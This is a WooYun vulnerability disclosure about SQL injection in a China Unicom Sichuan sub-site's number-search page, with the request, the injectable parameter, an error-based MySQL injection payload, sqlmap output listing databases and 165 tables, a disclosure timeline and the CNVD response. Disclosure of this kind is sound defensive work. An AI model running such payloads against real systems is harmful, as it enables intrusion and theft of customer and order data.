当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134004

漏洞标题:四川联通某分站sql注入

相关厂商:中国联通

漏洞作者: oyeahtime

提交时间:2015-08-16 09:41

修复时间:2015-10-02 10:28

公开时间:2015-10-02 10:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-16: 细节已通知厂商并且等待厂商处理中
2015-08-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

四川联通某分站参数不完全导致注入

详细说明:

http://**.**.**.**/ 在优选号码下

注入点.png


burp 抓包
GET /index.php?act=search&cate_id=344&search_input=100.00&number_part=185&user_set=0810&provence=510000&city=510100 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/index.php?act=search&cate_id=344
Connection: keep-alive
在参数search_input 存在注入
Payload:
act=search&cate_id=344&search_input=100.00 OR (SELECT 7534 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (ELT(7534=7534,1))),0x7178766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&number_part=185&user_set=0810&provence=510000&city=510100

[22:29:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0
[22:29:31] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] womall


漏洞证明:

165个表啊 没有深入了
[22:36:23] [INFO] fetching tables for data
Database: womall
[165 tables]
+------------------------------+
| wm_activity |
| wm_activity_detail |
| wm_address |
| wm_admin |
| wm_adv |
| wm_adv_click |
| wm_adv_position |
| wm_album_class |
| wm_album_pic |
| wm_area |
| wm_article |
| wm_article_class |
| wm_attribute |
| wm_attribute_value |
| wm_brand |
| wm_cart |
| wm_cheyibao_log |
| wm_city |
| wm_complain |
| wm_complain_goods |
| wm_complain_subject |
| wm_complain_talk |
| wm_consult |
| wm_coupon |
| wm_coupon_class |
| wm_daddress |
| wm_document |
| wm_evaluate_goods |
| wm_evaluate_goodsstat |
| wm_evaluate_store |
| wm_evaluate_storestat |
| wm_express |
| wm_favorites |
| wm_flowstat_1 |
| wm_flowstat_2 |
| wm_flowstat_3 |
| wm_flowstat_4 |
| wm_flowstat_5 |
| wm_gold_buy |
| wm_gold_log |
| wm_gold_payment |
| wm_goods |
| wm_goods_attr_index |
| wm_goods_class |
| wm_goods_class_staple |
| wm_goods_class_tag |
| wm_goods_group |
| wm_goods_spec |
| wm_goods_spec_index |
| wm_groupbuy_area_bbak |
| wm_groupbuy_class_bbak |
| wm_groupbuy_price_range_bbak |
| wm_groupbuy_template_bbak |
| wm_inform |
| wm_inform_subject |
| wm_inform_subject_type |
| wm_inventory |
| wm_link |
| wm_logs |
| wm_lottery_item |
| wm_lottery_log |
| wm_lottery_opt |
| wm_mail_msg_temlates |
| wm_map |
| wm_member |
| wm_member_log |
| wm_member_mail |
| wm_message |
| wm_navigation |
| wm_order |
| wm_order_address |
| wm_order_goods |
| wm_order_log |
| wm_p_bundling |
| wm_p_bundling_goods |
| wm_p_bundling_quota |
| wm_p_mansong |
| wm_p_mansong_apply |
| wm_p_mansong_quota |
| wm_p_mansong_rule |
| wm_p_xianshi |
| wm_p_xianshi_apply |
| wm_p_xianshi_goods |
| wm_p_xianshi_quota |
| wm_panic_log |
| wm_panicbuy |
| wm_payment |
| wm_payment_log |
| wm_phonenumber |
| wm_points_cart |
| wm_points_goods |
| wm_points_log |
| wm_points_order |
| wm_points_orderaddress |
| wm_points_ordergoods |
| wm_predeposit_cash |
| wm_predeposit_log |
| wm_predeposit_recharge |
| wm_promotion |
| wm_promotion_log |
| wm_province |
| wm_rec_position |
| wm_recommend |
| wm_recommend_goods |
| wm_refund |
| wm_refund_log |
| wm_return |
| wm_return_goods |
| wm_salenum |
| wm_sellers |
| wm_seo |
| wm_setting |
| wm_sign |
| wm_sign_felware |
| wm_sign_log |
| wm_sign_record |
| wm_sns_albumclass |
| wm_sns_albumpic |
| wm_sns_binding |
| wm_sns_comment |
| wm_sns_friend |
| wm_sns_goods |
| wm_sns_membertag |
| wm_sns_mtagmember |
| wm_sns_s_autosetting |
| wm_sns_s_comment |
| wm_sns_s_tracelog |
| wm_sns_setting |
| wm_sns_sharegoods |
| wm_sns_sharestore |
| wm_sns_tracelog |
| wm_sns_visitor |
| wm_spec |
| wm_spec_value |
| wm_store |
| wm_store_class |
| wm_store_class_goods |
| wm_store_extend |
| wm_store_goods_class |
| wm_store_grade |
| wm_store_gradelog |
| wm_store_navigation |
| wm_store_partner |
| wm_store_watermark |
| wm_stream_log |
| wm_transport |
| wm_transport_extend |
| wm_type |
| wm_type_brand |
| wm_type_spec |
| wm_upload |
| wm_user_panicbuy |
| wm_vir_goods |
| wm_vir_goods_class |
| wm_voucher |
| wm_voucher_apply |
| wm_voucher_price |
| wm_voucher_quota |
| wm_voucher_template |
| wm_warehouse |
| wm_web |
| wm_web_code |
| wm_wobei_log |
| wm_ztc_glodlog |
| wm_ztc_goods |
+------------------------------+

修复方案:

过滤每一个参数

版权声明:转载请注明来源 oyeahtime@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-18 10:27

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置.

最新状态:

暂无